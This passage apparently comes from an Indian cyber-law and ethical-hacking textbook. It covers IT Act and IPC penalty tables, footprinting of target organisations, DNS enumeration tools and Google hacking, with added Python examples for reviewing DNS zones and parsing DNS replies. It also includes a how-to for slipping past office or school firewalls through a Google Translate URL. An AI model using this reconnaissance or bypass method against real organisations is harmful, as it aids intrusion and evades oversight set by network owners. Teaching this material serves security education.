debates over privacy issues hampered the ability of enforcement agents to
gather the evidence needed to prosecute these new cases. Finally, there
was a certain amount of antipathy—or at the least, distrust—between the
two most important players in any effective fight against cyber crime: law
enforcement agencies and computer professionals. Yet close cooperation
between the two is crucial if we are to control the cyber crime problem
and make the Internet a safe "place" for its users.
Cyber laws are meant to set a definite pattern: rules and guidelines that
define which business activities conducted over the Internet are legal and
which are illegal and hence punishable. The IT Act 2000, the cyber law of
India, gives the legal framework so that information is not denied legal
effect, validity or enforceability solely on the ground that it is in the form
of electronic records.
Cyberlaw is a much newer phenomenon, having emerged well after the
onset of the Internet. The Internet grew in a completely unplanned and
unregulated manner. Even the inventors of the Internet could not have
really anticipated the scope and far-reaching consequences of cyberspace.
The growth rate of cyberspace has been enormous. The Internet is growing
rapidly, and with the population of the Internet doubling roughly every 100
days, Cyberspace is becoming the new preferred environment of the world.
With the spontaneous and almost phenomenal growth of cyberspace, new
and ticklish issues relating to various legal aspects of cyberspace began
cropping up.
In response to the absolutely complex and newly emerging legal issues
relating to cyberspace, CYBERLAW or the law of the Internet came into
being. The growth of Cyberspace has resulted in the development of a new
and highly specialized branch of law called CYBERLAWS: LAWS OF THE
INTERNET AND THE WORLD WIDE WEB.
[18] computersecuritysystem.net
Cyber law is a generic term which refers to all the legal and regulatory
aspects of the Internet and the World Wide Web: all aspects, issues and
legal consequences on the Internet, the World Wide Web and cyberspace.
India is the 12th nation in the world that has cyber legislation, apart from
countries like the US, Singapore, France, Malaysia and Japan. The
Information Technology (Amendment) Act, 2008 was passed by both
Houses of Parliament on 23.12.08. The Act was notified after the assent of
the Hon'ble President on 5.2.2009 and amended on 27th October 2009.
2.6. Offences under the IT Act and Indian Penal Code (IPC)
The Indian Penal Code (Hindi: Bhartiya Dand Sanhita) is a document that
covers almost all the crime happening in society. It is a piece of British
colonial legislation dating from 1860. Now it provides a penal code for all
of India. The code applies to any offence committed by an Indian citizen
anywhere and on any Indian-registered ship or aircraft. The Indian Penal
Code came into force in 1862 (during the British Raj) and is regularly
amended, for example to include section 498-A. It contains several
sections related to other laws in India and has a total of 511 sections
covering various aspects of criminal law. The nature of some of these
sections has led to allegations of abuse of those laws. [19]
[19] gcsl.in
2.6.1. Important Cyber law Provisions in India under IT Act

Offence | Section under IT Act | Imprisonment / fine
Tampering with computer source documents | Sec. 65 | Up to 3 years / 2 lakhs / both
Hacking with computer systems, data alteration | Sec. 66 | Up to 3 years / 5 lakhs / both
Punishment for sending offensive messages through communication service, etc. | Sec. 66A | -DO-
Punishment for dishonestly receiving stolen computer resource or communication device | Sec. 66B | Up to 3 years / 1 lakh / both
Punishment for identity theft | Sec. 66C | Up to 3 years / 1 lakh
Punishment for cheating by personating by using computer resource | Sec. 66D | Up to 3 years / 1 lakh
Punishment for violation of privacy | Sec. 66E | Up to 3 years / 2 lakhs / both
Punishment for cyber terrorism | Sec. 66F | Imprisonment / imprisonment for life
Publishing obscene information in electronic form | Sec. 67 | 5-7 years / 10 lakhs
Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form | Sec. 67A | -DO-
Punishment for publishing or transmitting of material depicting children in sexually explicit act, etc. in electronic form | Sec. 67B | -DO-
Preservation and retention of information by intermediaries | Sec. 67C | 3 years / depends
Un-authorized access to protected system | Sec. 70 | 10 years / depends
Penalty for misrepresentation | Sec. 71 | 2 years / 1 lakh
Breach of confidentiality and privacy | Sec. 72 | 2 years / 1 lakh
Punishment for disclosure of information in breach of lawful contract | Sec. 72A | 3 years / 5 lakhs / both
Publishing false digital signature certificates | Sec. 73 | 2 years / 1 lakh / both
Publication for fraudulent purpose | Sec. 74 | 2 years / 1 lakh / both
Punishment for attempt to commit offences | Sec. 84C | One-half year / depends
Compensation for damage to computer systems | Sec. 43 | 3 years / 5 lakhs / both
(-DO- means the same punishment as the preceding row.)
2.6.2. Computer Related Crimes Covered under Indian Penal Code and Special Laws

Offence | Section | Imprisonment / fine
Sending threatening messages by email | Sec 503, 506 IPC | 3-5 years / depends / both
Sending defamatory messages by email | Sec 499, 500 IPC | 2 years / depends / both
Forgery of electronic records | Sec 463, 464, 468, 469 IPC | 3-7 years / depends
Forgery | Sec 463 | 2 years / depends / both
Making a false document | Sec 464 | 2 years / depends / both
Forgery for purpose of cheating | Sec 468 | 7 years / depends
Forgery for purpose of harming reputation | Sec 469 | 3 years / depends
Bogus websites, cyber frauds | Sec 420 IPC | 7 years / depends
Web-Jacking | Sec 383 IPC | 3 years / depends / both
E-Mail abuse, online defamation | Sec 500, 509 IPC | 3-5 years / depends / both
Punishment for defamation | Sec 500 | 2 years / depends
Word, gesture or act intended to insult the modesty of a woman | Sec 509 | 1 year / depends
Criminal intimidation by e-mail or chat | Sec 506, 507 | 2-5 years / depends
Punishment for criminal intimidation | Sec 506 | 2 years / depends
Criminal intimidation by an anonymous communication | Sec 507 | 2 years / depends
Online sale of drugs | NDPS Act | Up to 10 years / depends / both
Online sale of arms | Arms Act | Up to 3 years / depends / both
Piracy | Sec. 51, 63, 63B Copyright Act | 1 year / 1 lac
Obscenity | Sec. 292, 293, 294 IPC, Indecent Representation of Women Act | 2-7 years / depends / both
Sale, etc., of obscene books, etc. | Sec. 292 | 2-5 years & 2000-5000
Printing etc. of grossly indecent or scurrilous matter or matter intended for blackmail | Sec. 292A | 2 years / depends
Sale, etc., of obscene objects to young person | Sec. 293 | 2-7 years / 2-5000
Obscene acts and songs in public place | Sec. 294 | 3 months with fine
Theft of computer hardware | Sec. 378, 379 | 3-5 years / depends / both
Theft | Sec. 378 |
Punishment for theft | Sec. 379 | 3 years / depends / both
Punishment for cheating and dishonestly | Sec. 420 | Up to 3 years / depends / both
Punishment of criminal conspiracy | Sec. 120B | 6 months / depends / both
2.6.3. Other Offences under IT Act & IPC

Offence | Section | Imprisonment / fine
Blackmailing | 292, 389, 420, 465, 467, 468, 471, 474 IPC r/w 67 of IT Act | Mentioned above
Creating fake profile | 67 IT Act, 507, 509 of IPC | Mentioned above
Credit card fraud | 66 of IT Act & 120(B), 420, 467, 468, 471 of IPC | Mentioned above
Data theft | 420/408/120B IPC r/w 66 IT Act | Mentioned above
Fake travel agent | 420, 465, 467, 468, 471, 34 of IPC r/w 143 of Indian Railway Act 1989 | Mentioned above
Hacking | 66 & 67 of IT Act | Mentioned above
Hosting obscene profiles | 67 of IT Act 2000, 469, 509 of the IPC | Mentioned above
Illegal money transfer | 467, 468, 471, 379, 419, 420, 34 of IPC & 66 of IT Act | Mentioned above
Morphed photographs | 67 of IT Act, 120-B, 506, 509 IPC | Mentioned above
Intellectual property theft | 65 and 66 of the IT Act 2000, 381, 420 of the IPC | Mentioned above
Obscene e-mails | 67 of IT Act 2000 r/w sec 2 of Indecent Representation of Women (Prohibition) Act 1986 | Mentioned above
Obscene phone calls | 67 of IT Act 2000 | Mentioned above
Online railway ticket fraud | 420 IPC | Mentioned above
Online stock exchange fraud | 420/120B IPC | Mentioned above
Sexual harassment | 419/501/507/509 IPC and 67 IT Act 2000 | Mentioned above
Email spoofing | Section 465, 419 IPC | Mentioned above
Email bombing | Section 66 IT Act | Mentioned above
Denial of service attacks | Section 43 IT Act | Mentioned above
Virus attacks | Section 43, 66 IT Act | Mentioned above
Salami attacks | Section 66 IT Act | Mentioned above
Logic bombs | Section 43, 66 IT Act | Mentioned above
Section 43, Under IT Act
Punishment in each case: damages by way of compensation to the person affected.

Section | Offence
Sec. 43(a) | accesses or secures access to such a computer, computer system or computer network or computer resource;
Sec. 43(b) | downloads, copies or extracts any data, computer data base or information from such computer, computer system or computer network including information or data held or stored in any removable storage medium;
Sec. 43(c) | introduces or causes to be introduced any computer contaminant or computer virus into any computer, computer system or computer network;
Sec. 43(d) | damages or causes to be damaged any computer, computer system or computer network, data, computer data base or any other programmes residing in such computer, computer system or computer network;
Sec. 43(e) | disrupts or causes disruption of any computer, computer system or computer network;
Sec. 43(f) | denies or causes the denial of access to any person authorized to access any computer, computer system or computer network by any means;
Sec. 43(g) | provides any assistance to any person to facilitate access to a computer, computer system or computer network in contravention of the provisions of this Act, rules or regulations made there under;
Sec. 43(h) | charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system, or computer network;
Sec. 43(i) | destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means;
Sec. 43(j) | steals, conceals, destroys or alters or causes any person to steal, conceal, destroy or alter any computer source code used for a computer resource with an intention to cause damage;
2.7. Measures to Prevent Cyber Crime [20]
The Information Technology Act 2000 was passed when the country was
facing the problem of growing cyber crimes. Since the Internet is the
medium for huge amounts of information and a large base of communications
around the world, it is necessary to take certain precautions while
operating on it.
Any person who operates on the net should always abide by the following
principles:
- He should not disclose any personal information to anyone, and
especially not to strangers.
- Updated and latest anti-virus software should be used to protect the
computer system against virus attacks.
- While chatting on the net one should avoid sending photographs to
strangers along with personal data, as they can be misused.
- Backup volumes of the data should always be kept to prevent loss from
virus contamination.
- Children should be prevented by their parents from accessing obscene
sites, to protect them from spoiling their mind and career.
- A credit card number shall never be sent to an unsecured site, to
prevent fraud or cheating.
- Effort shall be made to make a security code and program to guard the
computer system from misuse.
- Routers and firewalls can be used to protect the computer network.
- A check should be kept on the functioning of cyber cafes, and any
mishaps shall be reported to the concerned authorities.
- Efforts should be made to discourage misuse of computers and access
to unauthorized data.
[20] http://www.mondaq.com/india/x/28603/technology/Cyber+Crimes
CHAPTER 3
OS FOOTPRINTING
Objective
3.1 Introduction of Footprinting
3.2 Information Gathering
3.3 Tools of OS Footprinting
3.1 Introduction of Footprinting
Footprinting is part of the preparatory pre-attack phase and involves
accumulating data regarding the target's environment and architecture,
usually for the purpose of finding ways to intrude into that environment.
This is the easiest way for hackers to gather information about computer
systems and the companies they belong to. The purpose of this
preparatory phase is to learn as much as you can about a system, its
remote access capabilities, its ports and services, and any specific
aspects of its security.
3.1.1 Footprinting Term
Footprinting is defined as the process of creating a blueprint or map of an
organization's network and systems. [21] Information gathering is also
known as footprinting an organization. Footprinting begins by determining
the target system, application, or physical location of the target. Once this
information is known, specific information about the organization is
gathered using nonintrusive methods. For example, the organization's
own web page may provide a personnel directory or a list of employee
bios, which may prove useful if the hacker needs to use a social
engineering attack to reach the objective. A hacker may also do a Google
search or a Yahoo! People search to locate information about employees.
[21] hackingdictionaryblog.blogspot.com
The Google search engine can be used in creative ways to perform
information gathering. Blogs, newsgroups, and press releases are also
good places to find information about the company or employees.
Corporate job postings can provide information as to the type of servers
or infrastructure devices a company may be using on its network. Other
information obtained may include identification of the Internet
technologies being used, the operating system and hardware being used,
active IP addresses, e-mail addresses and phone numbers, and corporate
policies and procedures.
* Generally, a hacker spends 90 percent of the time profiling and gathering
information on a target and 10 percent of the time launching the attack. [22]
3.1.2 Information Gathering Methodology [23]
Information gathering can be broken into seven logical steps. The
footprinting process is performed during the first two steps: unearthing
initial information and locating the network range. Some of the common
sources used for information gathering include the following:
- Domain name lookup
- Whois
- Nslookup
- Sam Spade
Figure: Information gathering steps
Performing Whois requests, searching Domain Name System (DNS)
tables, and scanning IP addresses for open ports are other forms of open
source footprinting. Most of this information is fairly easy to get and
legal to obtain.
[22] http://technovortex.blogspot.in/2011/09/footprinting-tutorial-information.html
[23] http://my.safaribooksonline.com/book/certification/ceh/9780470525203/gathering-target-information-reconnaissance-footprinting-and-social-engineering/information-gathering_methodology
3.2 Information Gathering (Footprinting) can be done by using
3.2.1 Extracting Archive of Website using www.archive.org
The Internet Archive (IA) is a nonprofit organization dedicated to building
and maintaining a free and openly accessible online digital library,
including an archive of the World Wide Web. The Internet Archive was
founded by Brewster Kahle in 1996.
It is a nonprofit organization established to preserve Web sites by taking
regular "snapshots". The Wayback Machine provides links to older
versions of a webpage. [24]
[24] www.archive.org
3.2.2 Use of Google Earth [25]
It is a virtual globe, map and geographic information program that was
originally called Earth Viewer 3D, and was created by Keyhole, Inc., a
company acquired by Google in 2004. It maps the Earth by the
superimposition of images obtained from satellite imagery, aerial
photography and a GIS 3D globe. It is available under three different
licenses: Google Earth, a free version with limited functionality; Google
Earth Plus (discontinued), which included additional features; and
Google Earth Pro ($400 per year), which is intended for commercial use.
Once you download and install Google Earth, your computer becomes a
window to anywhere, allowing you to view high-resolution aerial and
satellite imagery, photos, elevation terrain, road and street labels,
business listings, and more. [26]
[25] www.archive.org
[26] http://en.wikipedia.org/wiki/Google_Earth
Google Earth interface elements [27]:
1. Search panel - Use this to find places and directions and manage
search results. Google Earth EC may display additional tabs here.
2. Overview map - Use this for an additional perspective of the Earth.
3. Hide/Show sidebar - Click this to conceal or display the sidebar
(Search, Places and Layers panels).
4. Placemark - Click this to add a placemark for a location.
5. Polygon - Click this to add a polygon.
6. Path - Click this to add a path (line or lines).
7. Image Overlay - Click this to add an image overlay on the Earth.
8. Measure - Click this to measure a distance or area size.
9. Sun - Click this to display sunlight across the landscape.
10. Sky - Click this to view stars, constellations, galaxies, planets and
the Earth's moon.
11. Email - Click this to email a view or image.
12. Print - Click this to print the current view of the Earth.
13. Show in Google Maps - Click this to show the current view in
Google Maps in your web browser.
15. Navigation controls - Use these to zoom, look and move around.
16. Layers panel - Use this to display points of interest.
16. Places panel - Use this to locate, save, organize and revisit
placemarks.
17. Add Content - Click this to import exciting content from the KML
Gallery.
18. 3D Viewer - View the globe and its terrain in this window.
19. Status bar - View coordinate, elevation, imagery date and
streaming status here.
[27] http://earth.google.com/intl/ar/userguide/v4/index.htm
3.2.3 Use of Job Sites to gather information of companies
3.3. OS Footprinting tools
3.3.1. Sam Spade [28]
Sam Spade (http://www.samspade.org) is a website that contains a
collection of tools such as Whois, nslookup, and traceroute. Because they
are located on a website, these tools work from any operating system and
are a single location for obtaining information about a target organization.
3.3.2. DNS Enumeration
DNS enumeration is the process of locating all the DNS servers and their
corresponding records for an organization. A company may have both
internal and external DNS servers that can yield information such as
usernames, computer names, and IP addresses of potential target
systems. NSlookup, DNSstuff, the American Registry for Internet
Numbers (ARIN), and Whois can all be used to gain information that can
then be used to perform DNS enumeration.
[28] http://www.samspade.org
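The same enumeration that gives an outsider usernames, computer names and addresses is worth running against your own public zone first, to see what it gives away. The following is an added example (not code from the book or from any tool it names) that parses a small zone export in the usual "name TTL IN type data" form and flags records that publish internal addresses or whose names hint at internal roles. The zone example.com, its records and the ROLE_HINTS wordlist are constructed placeholders.

```python
"""Review a public DNS zone export for records that leak internal details.

Added example, not code from the book or from any tool it names. The zone
below is constructed: example.com is a reserved documentation domain, the
public addresses come from the documentation ranges (192.0.2.0/24 and
198.51.100.0/24) and one record deliberately leaks a private address.
"""
import ipaddress
import re

# Constructed zone export in "name TTL class type data" form.
SAMPLE_ZONE = """\
; constructed sample zone
example.com.               3600 IN SOA   ns1.example.com. hostmaster.example.com. 2013010101 7200 900 1209600 300
example.com.               3600 IN NS    ns1.example.com.
example.com.               3600 IN MX    10 mail.example.com.
ns1.example.com.           3600 IN A     192.0.2.1
www.example.com.            300 IN A     192.0.2.10
mail.example.com.          3600 IN A     192.0.2.20
intranet.example.com.      3600 IN A     10.0.5.4
backup-srv01.example.com.  3600 IN A     198.51.100.7
vpn.example.com.           3600 IN A     192.0.2.30
dev-db.example.com.        3600 IN CNAME db01.corp.example.com.
"""

# Assumed wordlist of labels that describe a host's role or environment;
# a real review would use an organisation-specific list.
ROLE_HINTS = ("intranet", "backup", "dev", "db", "vpn", "corp", "staging", "admin")

# Address ranges that should never appear in a zone served to the Internet:
# RFC 1918, loopback, link-local and their IPv6 counterparts.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]

RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(.+?)\s*$")


def parse_zone(text):
    """Return a list of (name, ttl, type, data) tuples; ';' comments are ignored."""
    records = []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        match = RECORD_RE.match(line)
        if not match:
            raise ValueError(f"unparsed zone line: {line!r}")
        name, ttl, rtype, data = match.groups()
        records.append((name, int(ttl), rtype, data))
    return records


def is_internal_address(data):
    """True when A/AAAA data falls in one of INTERNAL_NETS; False for non-addresses."""
    try:
        addr = ipaddress.ip_address(data)
    except ValueError:
        return False
    return any(addr.version == net.version and addr in net for net in INTERNAL_NETS)


def review_zone(text):
    """Return (name, finding) pairs for records worth a second look, in zone order."""
    findings = []
    for name, _ttl, rtype, data in parse_zone(text):
        if rtype in ("A", "AAAA") and is_internal_address(data):
            findings.append((name, f"internal address published in public zone: {data}"))
        # Inspect the record's own labels and, for a CNAME, the target's labels too.
        labels = name.lower().rstrip(".").split(".")
        if rtype == "CNAME":
            labels += data.lower().rstrip(".").split(".")
        for hint in ROLE_HINTS:
            if any(hint in label for label in labels):
                findings.append((name, f"name reveals role or environment: '{hint}'"))
                break
    return findings


if __name__ == "__main__":
    for owner, finding in review_zone(SAMPLE_ZONE):
        print(f"{owner:28} {finding}")
```

Run against the sample, it reports the leaked 10.0.5.4 address on intranet.example.com plus the four names that describe internal roles. Records with no finding (ns1, www, mail) are what a public zone should look like; anything else is a candidate for moving into an internal-only view.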
Nslookup and DNSstuff
One powerful tool you should be familiar with is nslookup (see Figure
below). This tool queries DNS servers for record information. It’s included
in UNIX, Linux, and Windows operating systems.
29
Hacking tools such as Sam Spade also include nslookup tools.
Building on the information gathered from Whois, you can use nslookup
to find additional IP addresses for servers and other hosts. Using the
authoritative name server information from Whois (AUTH1.NS.NYI.NET),
you can discover the IP address of the mail server. The explosion of easy-
to-use tools has made hacking easy, if you know which tools to use.
DNSstuff is another of those tools. Instead of using the command-line
nslookup tool with its cumbersome switches to gather DNS record
information, just access the website http://www.dnsstuff.com, and you
can do a DNS record search online.
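What nslookup actually does on the wire, as an added example that is not part of the book: it builds a DNS query for one record type and decodes the answer section, including the name compression that MX and NS answers use. The response bytes below are constructed, not captured from any real server, so the demo runs offline; query_udp() sends the same query to a resolver you name.

```python
import socket
import struct

# Record types footprinting asks for (RFC 1035 / RFC 3596 type codes)
QTYPES = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "MX": 15, "TXT": 16, "AAAA": 28}
QTYPE_NAMES = {v: k for k, v in QTYPES.items()}


def encode_name(name: str) -> bytes:
    """Encode 'mail.example.com' as length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(name: str, qtype: str, txid: int = 0x1234) -> bytes:
    """12-byte header plus one question, as nslookup sends it (QR=0, RD=1, class IN)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPES[qtype], 1)


def decode_name(msg: bytes, off: int):
    """Decode a possibly compressed name (RFC 1035 4.1.4); return (name, offset after it)."""
    labels, end, jumped = [], off, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:  # 2-byte pointer to a name seen earlier in the message
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:
            if not jumped:
                end = off
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), end


def parse_response(msg: bytes):
    """Return [(owner, type, ttl, value), ...] from the answer section."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x000F:  # RCODE != 0, e.g. 3 = NXDOMAIN
        raise ValueError(f"server returned RCODE {flags & 0xF}")
    off = 12
    for _ in range(qd):  # skip the echoed question section
        _, off = decode_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        owner, off = decode_name(msg, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        if rtype == QTYPES["A"]:
            value = ".".join(str(b) for b in rdata)
        elif rtype == QTYPES["MX"]:  # 16-bit preference, then a (compressible) host name
            pref = struct.unpack("!H", rdata[:2])[0]
            value = f"{pref} {decode_name(msg, off + 2)[0]}"
        elif rtype in (QTYPES["NS"], QTYPES["CNAME"]):
            value = decode_name(msg, off)[0]
        else:
            value = rdata.hex()
        answers.append((owner, QTYPE_NAMES.get(rtype, str(rtype)), ttl, value))
        off += rdlen
    return answers


def query_udp(server: str, name: str, qtype: str, timeout: float = 3.0):
    """Send the query to a real resolver over UDP/53 (needs network; not used by the offline demo)."""
    q = build_query(name, qtype)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, 53))
        data, _ = s.recvfrom(4096)
    if data[:2] != q[:2]:
        raise ValueError("transaction id mismatch: response is not for our query")
    return parse_response(data)


def build_sample_response() -> bytes:
    """Constructed MX answer for example.com (not captured from any real server)."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 2, 0, 0)  # QR=1, RD=1, RA=1, RCODE=0
    question = encode_name("example.com") + struct.pack("!HH", QTYPES["MX"], 1)
    ptr = b"\xC0\x0C"  # pointer to offset 12, where 'example.com' sits in the question
    rrs = b""
    for pref, host in ((10, "mail1"), (20, "mail2")):
        rdata = struct.pack("!H", pref) + encode_name(host)[:-1] + ptr  # host.example.com
        rrs += ptr + struct.pack("!HHIH", QTYPES["MX"], 1, 3600, len(rdata)) + rdata
    return header + question + rrs


def enumerate_mx():
    """Offline run of the parser over the constructed response."""
    return parse_response(build_sample_response())


if __name__ == "__main__":
    for owner, rtype, ttl, value in enumerate_mx():
        print(f"{owner}\t{ttl}\t{rtype}\t{value}")
```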
3.3.3. SensePost Footprint Tools
SensePost is an independent and objective organization specializing in
information security consultation and assessment services. For all our
assessment we apply strict methodologies. This is especially true for
Internet Security Assessments, where our methodology has been
developed and tuned over many years. One of the challenges that
analysts at SensePost faced when engaging in assessments with
enterprise-sized clients was applying this tried and tested methodology in
an efficient and timely fashion. The requirement was to automate as
much of the mundane processes in this methodology as possible whilst
maintaining a high level of accuracy.
29 info-logy.blogspot.com
BiDiBLAH is a footprinting tool developed by SensePost to
specifically relieve our analysts from performing repetitive processes,
thus increasing efficiency, improving accuracy and allowing them to
concentrate on the areas of the assessment that require manual
attention. It also means that important aspects of the methodology
are contained and standardized in one entity, the tool. This in turn
means that you eliminate the potential risk of data loss and ensure
all assessments are conducted against the same accepted standard.
BiLE.pl
BiLE-weigh.pl
tld-expand.pl
vet-IPrange.pl
qtrace.pl
vet-mx.pl
jarf-rev
jarf-dnsbrute
3.3.4. Other tools
Big Brother
Big Brother Professional Edition (BBPE) is a simple way to measure
the health of your heterogeneous IT environment at-a-glance. It's an
easy-to-implement, affordable, web-based solution for IT
infrastructure monitoring and diagnostics. Get real-time monitoring
for any server (Windows, UNIX, and Linux) or device, on any network,
from any web browser, anywhere in the world. Simply follow the "red
light" to detect, diagnose and resolve any alert – before it becomes an
issue.
BiLE Suite
The BiLE suite includes a number of Perl scripts that can be used
by a penetration tester to aid in the enumeration phase of a test.
BiLE itself stands for Bi-directional Link Extraction utilities. The suite
of tools can be used in the footprinting process to find both
obvious and non-obvious relationships between disparate sites. With this
information a pen tester may then decide to try and access sites with
close relationships to the target as a stepping stone into
the target network.
Note: This process depends on the linked sites you plan to attack in order
to get through to your target actually being owned by the target company
and in the scope of the test.
Alchemy Network Tool
Alchemy Network Tools is a software package containing a set of
network analysis and diagnostic utilities that help network
administrators maintain and manage their networks through a
graphical interface. Alchemy Network Tools contains the following
network utilities:
Ping
Traceroute
NSLookup
Whois
HTTP/HTTPS request sender
SNMP request sender
The program also displays information about the local computer
network settings and traffic snapshot:
Route table
IP packet statistics
ICMP statistics
TCP statistics
UDP statistics
Advanced Administrative Tool (AATools)
AATools includes 12 different state-of-the-art tools for assessing,
optimizing, managing, and safeguarding your network and computers,
all in one easy to use program. It performs an inspection on
everything vital to network security as it pertains to the protection of
your computer, including the utilization of tools to check open ports,
proxies, email lists, Internet applications, and general system
information.
My IP Suite
My IP Suite is a network tool for working with IP addresses. It combines
Domain-to-IP Converter, Batch Ping, Tracert, Whois, Website Scanner
and Connection Monitor into a single interface as well as an IP-to-
Country Converter.
With the powerful IP & Web tool you can:
1. Lookup IP addresses for a single or list of domain names and
vice versa.
2. Find out the country associated with a single or list of domains
or IP addresses.
3. Perform batch and continuous pings on multiple servers.
4. Trace IP addresses to their destination and investigate
connection problems.
5. Obtain all available information on a given IP address or domain
name such as Organization or the ISP that owns the IP address,
including the country, state, city, address, contact phone
numbers and e-mails.
6. Determine the name, date, last-modified time, version and operating
system of the remote web server.
7. Allow you to scan any given web site and produce a list of links
found in the site, using several criteria to filter the results.
8. Monitor all the TCP/IP connections from your computer to the
internet automatically.
9. Get all of the information about the website currently open in
Internet Explorer.
Wikto Footprinting Tool
Wikto is a tool that checks for flaws in webservers. It provides much
the same functionality as Nikto but adds various interesting pieces of
functionality, such as a Back-End miner and close Google integration.
Wikto provides the same functionality as the Nikto tool, but it goes a
little further. There are three main sections of the tool: the Back-End
miner, Nikto-like functionality and the Googler.
More tools are listed in the EC-Council module for Ethical Hacking;
find them through web searching.
CHAPTER 4
GOOGLE HACKING
Objective
4.1 Introduction of GOOGLE
4.2 Uses of Google Hacking Database
4.3 Google hacking techniques
4.4 Preventing Google hacking attacks
4.1. Google Hacking
Google hacking is a computer hacking technique that uses Google
Search and other Google applications to find security holes in the
configuration and computer code that websites use.
Google hacking is the use of a search engine, such as Google, to locate a
security vulnerability on the Internet. There are generally two types of
vulnerabilities to be found on the Web: software vulnerabilities and mis-
configurations. Although there are some sophisticated intruders who
target a specific system and try to discover vulnerabilities that will allow
them access, the vast majority of intruders start out with a specific
software vulnerability or common user mis-configuration that they
already know how to exploit, and simply try to find or scan for systems
that have this vulnerability.
4.2. Uses of Google Hacking Database
Information that the Google Hacking Database identifies:
Advisories and server vulnerabilities
Error messages that contain too much information
Files containing passwords
Sensitive directories
Pages containing logon portals
Pages containing network or vulnerability data such as firewall
logs.30
4.3. Google Hacking Techniques
Using Google with complex search queries, in order to filter through a
large number of result pages and display only highly targeted
information, is termed Google hacking.
Google hacking is used as a technique to find information pertaining to
the information security of a target. Using Google hacking, an attacker can
find security vulnerabilities and other important data on a web server
(which is otherwise maintained only for use by authorized
personnel).
4.3.1. Anonymity with Caches31
Google’s cache feature is truly an amazing thing. The simple fact is that if
Google crawls a page or document, you can almost always count on
getting a copy of it, even if the original source has since dried up and
blown away. Of course the down side of this is that hackers can get a
copy of your sensitive data even if you’ve pulled the plug on that pesky
Web server. Another down side of the cache is that the bad guys can
crawl your entire Web site without even sending a single packet to your
server. If your Web server doesn’t get so much as a packet, it can’t write
anything to the log files. If there’s nothing in the log files, you might not
have any idea that your sensitive data has been carried away. It’s sad
that we even have to think in these terms, but untold megabytes,
gigabytes, and even terabytes of sensitive data leak from Web servers
every day. Understanding how hackers can mount an anonymous attack
on your sensitive data via Google’s cache is of utmost importance.
Privacy-providing tools, including tools that provide anonymity, are
gaining popularity in the modern world. Among the goals of their users is
30 nolimite.webcindario.com
31 books.google.co.in/books?isbn=1597491764
avoiding tracking and profiling. Currently, users interested in
anonymous browsing have the choice only between single-hop proxies
and the few more complex systems that are available. These still leave
the user vulnerable to long-term intersection attacks.
4.3.2. Using Google as a Proxy Server
This section describes how to bypass an office proxy server or school
firewall to surf blacklisted websites, by using Google application tools as
a second, legitimate proxy server!32
a. How to use Google.com as proxy server to surf blocked/banned
websites?
Google language translator tool can surf and perform language
translation on websites or articles. Ordinary people, like me, will simply
use it as a language translator, to translate a web page into English or
mother-tongue. But, you can also use the Google language tool as a
proxy server to surf banned/black-listed web pages!
Of course, there are other language translators (e.g. AltaVista Babel
Fish) that can easily serve the same purpose. But, as I said just now,
Google.com is less likely to be banned/blocked by any proxy server or
firewall on Earth.
32 walkernews.net
This trick will also fail if a smart proxy server is used that scans
the whole URL for prohibited strings/keywords.
But if you are going to use the Google language translator as a proxy server
to surf blocked web pages in English, which is your mother tongue or the
only language you understand, you may feel disappointed. There is no
English to English translation in the option menu.
Just use “Spanish to English”, “French to English”, “German to
English”, “Japanese to English”, etc.; any of these will do the job.
This trick works because a German web page will not be 100% written in
the German language. So the Google language translator will only convert the
German words and sentences to English; otherwise no conversion will
be done!
For example, this is how you use the Google language translator tool to
surf torrentscan.com, torrentz.com, etc., in an office with the damn Squid
proxy server. If you are able to see these blacklisted sites, then using the
Google language translator tool as a second proxy server will work for your
case!
b. How to use Google language translator tool as a proxy server?
It is done by using Google’s translator and changing the URL to translate
English to English like this:
http://www.google.com/translate?langpair=en|en&u=www.website.com
and changing website.com to whatever website you can’t get to.
In the URL you can see en|en; that is the bit that tells Google to translate
English to English. You can also do it with many languages; you just need to
know which letters to use. I know French to French is fr|fr.
It may not work with every firewall, or with every site you want to visit,
but it could be worth a try if you need to, say, finish your online holiday
shopping and your boss is an ecommerce-blocking Scrooge. Anyway, this
trick only works for text. Multimedia content such as JPEG
pictures, QuickTime movies, RealMedia files, etc., will not work
(display). Never mind, you can try another Google application tool
called Google Wireless Transcoder.
This Google application is developed to convert a normal web page into a
format that is optimized for rendering in a WAP browser, such as the
web browsers in wireless PDAs and 3G smartphones (such as the Nokia N95
and Dopod C838P).
Google Wireless Transcoder will download the target web page, including
those jpeg pictures of the site, and reformat the web page layout for best
viewing in mini web browser of smart-phones.
4.3.3. Directory Listings
Web server applications such as Apache and IIS provide a facility by which a
user can browse and navigate website directories by clicking on a
directory name and links such as Parent Directory. The directories and
their contents can be listed if directory listing or directory browsing is
enabled by the administrator. This vulnerability gives unauthorized
access to the files, and it may help hackers to gain access to
information which can help them to hack a website or a web server or
download its contents.
Directory listings make the parent directory links available to browse
